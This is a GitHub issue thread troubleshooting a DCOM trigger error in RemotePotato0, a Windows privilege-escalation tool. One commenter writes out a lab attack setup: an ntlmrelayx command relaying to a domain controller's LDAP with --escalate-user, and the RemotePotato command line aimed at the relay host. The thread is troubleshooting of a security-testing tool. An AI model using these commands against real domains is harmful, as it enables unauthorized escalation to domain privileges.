### ISSUE TITLE
Trigger DCOM failed

### ISSUE THREAD

**Issue by Lucifer1993** [antonioCoco/RemotePotato0#6]
when i use the prog to test my machine its exception:
[!] Error. Trigger DCOM failed with status: 0x800706ba
how do deal with it

**Comment by antonioCoco** [comment]
this is a generic error and further information are needed for troubleshoot.

please include more information on how you got it:

- which windows version are you testing?
- what are the commands you are running on the relay node? Please send commandline and output of socat and ntlmrelayx commands.
- what is the commandline of RemotePotato0 you are using?

**Comment by SumenjakZiga** [comment]
Same error here. Attacking a Win Server 2012 R2 with a Win10 21H1 connected to the domain. 
Win Server 2012 R2 IP: 192.168.0.102
Win10 21H1 IP: 192.168.0.65
Kali IP: 192.168.0.92
First I'm connecting to the Win10 VM with ssh: "domain\user@192.168.0.65" from Kali. Relay on kali: sudo ntlmrelayx.py -t ldap://192.168.0.102 --no-wcf-server --escalate-user user. On the ssh connection command: RemotePotato.exe -r 192.168.0.92 -p 9998.
I changed the CLSID for the Win Server 2012 R2 as recommended in a closed issue.

**Comment by antonioCoco** [comment]
@SumenjakZiga  you got a different error from the original issue. That error is related from impacket, no idea where it comes from. 

@Lucifer1993 i'm closing this issue, feel free to bump it again if needed.
